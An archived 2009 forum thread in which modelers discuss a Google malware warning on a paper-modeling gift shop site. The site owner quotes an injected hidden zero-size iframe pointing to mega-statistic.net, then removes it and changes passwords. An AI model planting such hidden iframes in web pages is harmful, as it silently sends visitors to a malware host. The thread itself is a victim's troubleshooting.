Lower Hudson Valley Paper Modleing Gift Shop

Discussion in 'Space & Aeronautics' started by bemma, Aug 9, 2009.

Thread Status:
Not open for further replies.
  1. bemma

bemma New Member

Google is reporting that the Lower Hudson Valley Paper Modeling Gift Shop site "May Harm your Computer". I was just at the site a couple of days ago and didn't get this message. Does anyone know what's going on?

2. ovation

ovation Member

The other addy for the main site looks ok,
    It could be a warning for malware,Ive had to it before on a few music bands web sites,
    Usualy it'l work out in a few days time (?)

3. Maico Shark

Maico Shark Guest

I will tell you that I recently visited that site and afterward my computer crashed so that I could not access the internet. The bug could not be detected by Norton or several free spyware programs though Adaware detected a trojan horse but could not delete it. Had I known about the Google warning I would have stayed away. I will investigate this matter further, thanks for the heads up bemma. (I had to replace my computer)
  4. Retired_for_now

Retired_for_now New Guy

Quick check seemed OK for me

Not sure what the problem might be - I just pulled up jleslie48.com - the Lower Hudson Valley Challenger Center - with no problems. The home page, downloads, chronological list of downloads, and real space pages pulled up OK as well as a few random download pages. ?????

5. jleslie48

jleslie48 Member

Hello all, jon, as in Jleslie48 of the lower hudson valley challenger center website here. I'm a bit surprised about the trojan warning at LHVCC.ORG or jleslie48.com , I will be investigating. This is news to me. The home page is the only one that uses swf, for the clock and counter, I can't imagine what else on the page could be triggering any warning. If any other symptoms arise, please let me know. I will look into this further.

6. Retired_for_now

Retired_for_now New Guy

Sent Jon a note to check. Warning appears on the Google search results page - but I haven't had any indication of actual problems from the web site.

Oops - hello Jon. I'm OBE, never mind. You've got it.
  7. davelant

davelant Member

If you search the site on google, then click on the link, it brings you to a warning page, and provides a link to a "Safe Browsing diagnostic page" with more information.
  8. jleslie48

jleslie48 Member

the only thing that is strange to my code is this line which I never put in:

<iframe src="http://mega-statistic.net/1/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

That is new to me, and I don't remember doint that. I don't know how that got there.

very strange.
  9. Retired_for_now

Retired_for_now New Guy

If it worked before without it, sounds like the delete key is a good option.

Yogi (amazed that anyone still understands this stuff)
  10. jleslie48

jleslie48 Member

It certainly did. I'm still very upset as to how it got there in the first place. Like my wife's fight with the cave crickets in the basement, she can delete the crickets, but how did they get in...
  11. Maico Shark

Maico Shark Guest

Glad you're on the case Jon, please keep this thread updated. Knowing where it came from IS the key to security.
  12. davelant

davelant Member

"mega-statistic.net" gets the thumbs down when you google it.
  13. jparenti

jparenti Member

I visited the site anyway, despite the warning, the other day. Nothing happened. I'm fairly well protected, and I assumed it was a mistake. I didn't have any problems at all.
  14. Maico Shark

Maico Shark Guest

All I can say is that when your trusty computer dies a virus infected death you take all such warning seriously. To assume Google just "made a mistake" because you didn't get immediately shut down does not mean a trojan horse was not transferred, or that data from your computer is not being transmitted to a third party. You may be right...but between you & Google I have to wonder who has the better detection resources. I feel all links to that site should be removed from our forums until the issue is resolved out of concern for our members.
  15. Retired_for_now

Retired_for_now New Guy

Well, your call but that's a bit extreme given I, jparenti, and others haven't had a problem with the site (and I'd put my faith in a current Norton full scan last night that came up clean for my system). Give it a day or two for Google to recrawl and adjust. I don't think I've posted any links anyway, just reference by name or plain text address (I don't like hyperlinks or Microserf's random assumption of same anyway).

Your job, your call Maico.

16. jparenti

jparenti Member

Removing all links due to a temporary problem would be a rash decision. Let's let jleslie figure it out and see what happens. I don't want to see a stigma attached to a very useful site that had helped many modelers, and definitely helps jleslie.
  17. jleslie48

jleslie48 Member

Ok, it seems that mega-statistic is crawling through something to get into my site. I see they added the nasty code again tuesday morning at 11:22am. They are lame enough so that the code is non-functional, it cannot be accessed Its not in any table data of a table. Google's virus checker is flagging it because mega-statistic is in the html page.

I realized I left one password unchanged the last time I removed mega-statistic, so now I've updated the pages again, and now ALL the passwords have been changed. Lets see if that stops these folks. Meantime my ISP has been alerted; they of course are making me jump through all of the password hoops before they will check to see if it is on their side.

Meantime to be fair to my ISP, my wife less than week before I had this trouble made a webpage under my domain for the first time... Very suspicious that all of a sudden for the first time in 5 years I'm having an issue.
  18. Maico Shark

Maico Shark Guest

Well links to stores are against our rules anyway and I actually didn't see one. But if there is a link to a store or commercial website, that would need permit from site owners. So please don't post any without prior approval.
  19. underwoodl06

underwoodl06 Member

I hate that stupid new rule, it limits our ability to share sites with other forum users. If someone wants help finding a page, how are we supposed to go about being a good person and helping if we aren't allowed to post a link without being banned from the site for it? What happened to the site? and who's 'bright idea' was it to impliment this new rule?
  20. theanalogkid

theanalogkid Member

I haven't posted for a while, but I thought was important. I had very similar problems to you, which I fixed with a program called ComboFix.
    Here's a link.

Thread Status:
Not open for further replies.